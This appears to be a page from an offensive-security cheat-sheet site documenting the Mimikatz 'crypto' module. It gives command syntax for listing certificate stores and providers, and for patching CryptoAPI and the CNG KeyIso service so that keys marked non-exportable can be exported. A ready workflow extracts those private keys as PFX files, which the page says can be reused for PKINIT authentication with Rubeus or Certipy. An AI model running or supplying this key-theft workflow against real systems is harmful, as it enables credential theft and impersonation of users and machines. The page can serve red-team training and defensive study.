🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🐱 Mimikatz / crypto

crypto

Interact with Windows CryptoAPI and CNG (Cryptography Next Generation). Patch providers to make non-exportable private keys exportable. Export certificates and keys.

Prerequisites

Most operations require privilege::debug. The cng command additionally patches the KeyIso service.

providers β€” List Crypto Providers

mimikatz # crypto::providers

Lists all available CryptoAPI and CNG providers on the system.

stores β€” List Certificate Stores

mimikatz # crypto::stores [/systemstore:<store>]
  • /systemstore:<store> β€” e.g. CERT_SYSTEM_STORE_LOCAL_MACHINE or CERT_SYSTEM_STORE_CURRENT_USER

certificates β€” List and Export Certificates

List certificates and key properties. Export public (DER) and/or private (PFX) keys.

mimikatz # crypto::certificates [/systemstore:<store>] [/store:<storename>] [/export]

Options

  • /systemstore:<store> β€” system store location (default: current user)
  • /store:<storename> β€” certificate store name (e.g. My, Root, CA)
  • /export β€” export certificates (public as .der, private as .pfx if accessible)

Examples

# List all user certificates
mimikatz # crypto::certificates

# Export all local machine certificates
mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /export

# Export from specific store
mimikatz # crypto::certificates /store:My /export

keys β€” List and Export Crypto Keys

List and export CryptoAPI and CNG keys by provider.

mimikatz # crypto::keys [/provider:<name>] [/providertype:<n>] [/cngprovider:<name>] [/export] [/machine]

capi β€” Patch CryptoAPI (Make Keys Exportable)

Patch CryptoAPI functions in the current process to allow exporting keys that are marked as non-exportable.

mimikatz # crypto::capi

After patching, keys marked non-exportable can be exported within the mimikatz process scope. Combine with crypto::certificates /export to extract private keys.

cng β€” Patch CNG KeyIso Service (Make Keys Exportable)

Patch the KeyIso service (key isolation service) to allow exporting CNG non-exportable keys. Requires privilege::debug.

mimikatz # crypto::cng

sc β€” List Smartcard/Token Readers

mimikatz # crypto::sc

Lists smartcard/token readers and attempts to enumerate keys if the CSP is available.

scauth β€” Create Smartcard Auth Certificate

Create a client authentication certificate signed by a specified CA for smartcard authentication.

mimikatz # crypto::scauth /caname:<ca-name> /upn:<upn> [/pfx:<output.pfx>]

Workflow: Export Non-Exportable Certificate Private Key

mimikatz # privilege::debug
mimikatz # crypto::capi
mimikatz # crypto::cng
mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:My /export

This exports .pfx files with private keys that were previously marked non-exportable.

Notes

  • File system ACLs and UAC may restrict access to private key files even after patching
  • CNG keys are in the KeyIso service, CAPI keys are in process β€” patching both covers most scenarios
  • Exported PFX files can be used for PKINIT authentication with tools like Rubeus, Certipy, etc.